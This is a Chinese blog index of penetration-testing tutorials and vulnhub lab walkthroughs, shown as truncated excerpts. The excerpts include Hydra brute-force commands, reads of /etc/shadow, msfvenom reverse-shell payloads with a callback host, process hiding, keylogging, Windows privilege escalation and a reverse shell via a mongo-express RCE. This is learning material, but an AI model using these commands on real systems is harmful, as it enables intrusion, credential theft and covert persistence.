
渗透测试
文章平均质量分 65
Thgilil
少就是多,慢就是快
展开
-
渗透工具——Hydra破解弱密码
Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。1.对ssh进行爆破hydra -L user.txt -P password.txt ssh://192.168.3.163-s 指定端口hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 77442.将破解密码保存到指定文件hydra -L user.txt -P password.txt ssh://192.168.3.163原创 2021-10-14 09:46:48 · 1064 阅读 · 0 评论 -
Windows、Linux密码破解—John、Hydra、hashcat、Mimikatz等工具基本使用
密码破解字典https://github.com/danielmiessler/SecListsLinux密码破解在linux中,密码放在/etc/passwd和/etc/shadow中,如果我们读取到了加密密码,就可以复制下来对其进行破解。cat /etc/passwdcat /etc/shadowjohn the ripper加密密码破解字典:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leak原创 2021-09-16 15:29:36 · 3493 阅读 · 0 评论 -
端口渗透—23端口Telnet
Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。Telnet远程登录telnet 192.168.0.124获取Telnet服务版本 nmap -sV -p23 <ip>MITM:远程登录欺骗通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务,通过钓鱼使其登录此telnet服务,一旦其尝试登录此虚假的telnet服务,我们就可以获取到他的登录凭证。这种和钓鱼有异曲同原创 2021-09-15 19:23:27 · 6077 阅读 · 1 评论 -
端口渗透——21端口FTP
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口是21,当共享数据时会被打开。枚举ftp服务的版本信息nc -vn <ip> 21获取FTP证书(如果存在)openssl s_client -connect <ip>:21 -starttls ftp匿名登录文件可以被隐藏,所以匿名登录可能看不到文件ftp <ip>>anonymous>anonymous>ls -a浏览器连原创 2021-09-15 18:16:19 · 9173 阅读 · 0 评论 -
Metasploit渗透——msfvenom隐藏恶意进程
我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。第一种方法通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lpor原创 2021-09-15 17:45:59 · 907 阅读 · 1 评论 -
Metasploit渗透——msfvenom生成shell速查
接受反弹shelluse exploit/multi/handlerset payload <payload name> #和下面的反向shell制作的载荷相同set LHOST <本机地址>set LPORT <本机监听端口>set ExitOnSessio false #可以让建立监听的端口继续保持监听,可接受多个sessionexploit -j -z #-j为后台任务,-z为持续监听Msfvenom载荷制作命令生原创 2021-09-15 13:50:23 · 662 阅读 · 0 评论 -
Metasploit渗透——meterpreter基础命令
Meterpreter系统信息sysinfo用户标识getuid获取权限getsystem当前目录pwd列举进程ps键盘记录##扫描远程计算机键盘活动keyscan_start##显示远程计算机键盘活动keyscan_dump##停止扫描远程计算机键盘活动keyscan_stop显示驱动器show_mount截屏保存远程PC的屏幕截图screenshot从kali上传文件upload /root/abc.exe C:\\system32原创 2021-09-15 11:51:18 · 301 阅读 · 0 评论 -
Windows提权—进程注入、Unattended Installs提权
进程注入提权使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现下载pinjector.exehttps://www.tarasco.org/security/Process_Injector/index.html上传 pinjector.exe到靶机可执行目录##列取所有进程pinje原创 2021-09-12 18:11:05 · 1067 阅读 · 0 评论 -
windows提权—烂土豆(RottenPotato)及Juicy Potato提权
介绍烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户适用版本:Windows 7、8、10、2008、2012烂土豆下载地址:https://github.com/foxglovesec/Potato烂土豆提权原理:欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通原创 2021-09-11 21:44:35 · 16428 阅读 · 0 评论 -
windows提权—msf、at、sc提权
msf提权适用版本:windows 2k3、xp获取到服务器的 meterpreter 后,有三个方向getsystem提权可以直接使用 getsystem 提权没成功绕过UAC策略MSF使用注册表 bypass uac 提权漏洞模块:exploit/windows/local/askexploit/windows/local/bypassuacexploit/windows/local/bypassuac_injection操作:use exploit/window原创 2021-09-10 18:04:51 · 785 阅读 · 0 评论 -
windows—令牌窃取
令牌的定义令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。Windows下的访问令牌分为:* 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)* 模拟令牌(Impersonation token):非原创 2021-09-10 15:28:31 · 1669 阅读 · 0 评论 -
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
mongo-expressmongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写漏洞介绍在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码复现环境mongo-express 0.53.0 MongoDB Version 3.4.24漏洞环境搭建采用github开源docker漏洞环境搭建而成项目地址:https:/原创 2021-09-07 22:27:26 · 4467 阅读 · 2 评论 -
DC-4靶场练习—teehee提权
DC系列第四个靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/老规矩先扫描以下局域网内的主机iparp-scan -l扫一下端口:nmap -A -p- 192.168.1.101只看放了22和80端口,先进80端口看看有什么只有一个表单,猜测Username应该是admin,先不急着爆破。用dirsearch扫了一下目录,只有一个登录界面:所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不原创 2021-06-09 16:04:11 · 694 阅读 · 0 评论 -
DC-3靶机—linux内核提权
(闲话,vm挺好,但占用内存大且有时候莫名其妙的工具连不上网络.vbox挺轻便的,但是增强设备也安装不上去,文件和主机无法互通,难道一个后门木马我手打?)靶场:DC-3下载地址:https://www.five86.com/dc-3.html先扫描以下局域网内存货主机:arp-scan -l端口:nmap -A -p- 192.168.1.101发现只开放了80端口,访问试试:作者提醒我们这个靶机只有一个flag和一个进入点,没有线索提示我们发现nmap扫描出此站点是由joom原创 2021-06-07 23:37:40 · 600 阅读 · 1 评论 -
DC-2靶场-渗透测试
靶机:DC-2下载地址:https://www.vulnhub.com/entry/dc-2,311/下载后导入和kali相同的虚拟机平台即可靶场的网络模式设置为桥接模式,启动1.先以ARP扫描以下局域网内靶机的iparp-scan -lnetdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索2.使用nmap扫一下ip查看端口开放nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙原创 2021-06-06 18:23:16 · 747 阅读 · 1 评论 -
DC-1靶场练习
靶机 DC-1下载地址:https://www.vulnhub.com/entry/dc-1,292/将靶机拖入虚拟机运行,打开即可上来先用kali中的工具扫描以下局域网中的ip#ip addr#arp-scan -lor#netdiscover -r 192.168.1.0/24 -i eth0知道靶机ip后,nmap扫一下端口nmap -A -p- 192.168.1.101看到22、80、111端口和其详细信息,了解到该网站由drupal7搭建先访问80端口看看没有发现原创 2021-06-05 15:54:52 · 182 阅读 · 0 评论